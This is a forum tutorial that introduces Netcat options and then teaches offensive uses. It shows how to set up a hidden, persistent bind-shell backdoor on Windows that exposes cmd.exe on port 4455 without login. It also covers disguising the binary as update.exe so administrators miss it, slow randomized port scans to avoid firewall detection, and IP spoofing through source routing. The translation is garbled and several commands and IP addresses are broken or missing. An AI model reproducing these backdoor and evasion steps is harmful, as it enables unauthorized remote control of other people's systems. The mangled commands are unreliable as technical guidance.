Forum Thread: Netcat Tutorial for Newbies


In summary Netcat makes and accepts TCP and UDP connections. That is all! Netcat writes and reads data on this type of connection until it is closed. Provides a basic TCP / UDP based networking subsystem that allows users to interact in a normal or scripted way with network applications and services over the application layer. It will allow us to view raw TCP and UDP data before they are covered by the next top layer, such as FTP, SMTP, or HTTP. Before continuing I must tell you that you will have to have Netcat in C: WINDOWSSystem32 for issues that I am not essential to this manual.


The basic command line for Netcat is nc options host ports, where host is the IP address that you want to parse and ports is either a certain port or a range of ports or a series of ports separated by spaces. Let's take a look at each of the options.

-d Allows nc to work silently and disengage from the MS-DOS command prompt.

-e <command> A nc listening can execute the <command> the instant someone connects to the port on which they are listening.

-i <seconds> Waiting interval, which is the amount of time nc will wait between two successive data submissions.

-g <path-list> You can specify up to 8 -g options on the command line to force your nc traffic to pass through certain IP addresses.

-G <hop pointer> This option will allow you to define which IP address will be the next hop within the path indicated with the -g option.

-l Turn on the nc listening mode.
-L Turn on the nc listening mode but with more interest.
-n Indicates to nc that it does not perform any query of host names.
-o <filehex> Performs a hexadecimal dump of the data and stores it in a hexadecimal file.
-p <port> Lets you specify the local port to use nc.
-r Nc will randomly choose local and remote ports.
-s Specifies the source IP address to use when making connections.
-t Is able to control the negotiation of Telnet options.
-u Tells nc to use UDP instead of TCP.
-v Enter the status of nc, if you put another -v you can get more information.
-w <seconds> Controls how long nc will wait before terminating a connection.
-z Tells nc to send the amount of data needed to know what ports are listening to something.


If you run the nc.exe -l -p4455 -e cmd.exedes command from a command prompt window on a Windows NT or Windows 2000-based platform, anyone performing a Telnet to port 4455 platform will encounter a DOS shell without having to log in to it.

Quite elegant, but also a bit scary. Almost without effort we just get a command prompt on the attacked system. Naturally, on Windows NT and Windows 2000 systems, you will have the same privileges and services as the user running Netcat. If we create this way a back door in Windows 95 and Windows 98 we will have a complete control.

We will continue to deepen this command, remember that by default Netcat will run in the DOS window that has been started, this means that the command control window will have to remain open while Netcat is running. We will use the -d option to separate it from the command prompt.

C:> nc.exe -l -p 4455 -d -e cmd.exe

This way, we can hide a backdoor based on Netcat.

However if someone performs a Telnet to port 4455 and connects, as soon as the connection is terminated, Netcat will think that their work is over and will stop listening. To avoid this we will use the -L option telling Netcat to listen with more interest even after the connection is finished.

C:> nc.exe -p 4455 -e cmd.exe -L -d

This will allow us to return to the system until the system administrator discovered the back door. And to avoid that we discover we can change the name of nc.exe by anything else. Note: in this example I have nc.exe that I will move in C: and not in C: WindowsSystem32

Anyone can ignore something as seemingly harmless as update.exe. Another feature of Netcat is that if we use it without any option on the command line, we will be prompted to enter it in the first line of the standard input.


Because Netcat can talk to a range of ports, a very obvious use would be to use it as a port browser. The -z option is the answer. This option will tell Netcat to send a certain amount of data to a port, but that amount will only be enough to know if the port is open or not. In this case we will use the -vo -vv option because without at least one -v we will not be able to see the result of the scan. Here I am doing a port scan at from 139 to 145. I got as a result that only 139,141 and 142 are open.

But this way is not the right thing to say because some firewall applications will block a particular IP address if they receive too many connections over it in a very short period of time. For us to not happen this Netcat allows to make explorations of a more discreet way, so discreet that will not seem like a port exploration. You can use the -i option and configure a test interval and the -r option to do it randomly. You can do the same procedure for UDP ports only by adding it to your command line.


Substituting an IP address is simple. Firewalls that perform masquerading or a translation of network addresses daily supplant IP addresses. These devices take a packet from an internal IP address, change the source IP address of the packet to its own IP address, send it over the network, and undo the modifications when they receive the data from the destination again. Therefore, we say that modifying the contents of the source IP address in an IP packet is simple. What is difficult is to be able to receive data from a deprecated IP address.

Netcat has the -s option that will allow us to specify the IP address we want. Anyone could start a port scan using the -s option to make them think they are being scanned by Microsoft or the FBI. However, the problem comes when we want to forward the responses issued by the port deployed to our real IP address. Suppose, for example, that the destination host thinks that it has received a Microsoft connection request, it will attempt to send a acknowledgment message to that Microsoft IP. Of course, this IP address will have no idea what the host host is talking about and will send a reset. How can we send the information back to the real IP address without being discovered?

Instead of attacking the target machine, the only other viable option is to use source-dependent routing. Source-dependent routing allows a network application to specify the route it wants to follow to reach its destination.

There are two types of routing dependent on origin: strict and relaxed. String-dependent routing means that the packet must specify each hop to make in the path until it reaches the destination host. Some routers and other network devices continue to allow strict source-dependent routing, but very few allow routing dependent on the relaxed source. Routing-dependent routing tells routers and network devices that routers can do most of the routing to the target host, this process will allow us to have the packet pass through our machine on its way back. Using this method, source-dependent routing can allow us to supplant an IP address and get the answers to your return trip. Most routers ignore source-dependent routing options, but not all routers.

The -g option of Netcat will allow us to specify up to 8 jumps that must be given by the packet before arriving at its destination, for example: nc -g -g -g -g 10.10. 9.50 23 will contact the telnet port on, but if source-dependent routing options are enabled on intermediate routers, traffic will be forced to follow the route through these 4 locations before reaching its destination. If we try nc -g -g -g -g -G 12 23, in this command we will be specifying a jump pointer using the -G option. The -G option will set the jump pointer to the n-simo byte (in this case the twelfth) and since the IP addresses are 4 bytes in length, the jump pointer will start at So on your way to, traffic will need to traverse only the last two machines (because according to the jump pointer we have already been in the first). However on the return trip the package will go through the 4 machines.


Our Best Hacking & Security Guides

New Null Byte posts — delivered straight to your inbox.

1 Response

Share Your Thoughts

  • Hot
  • Active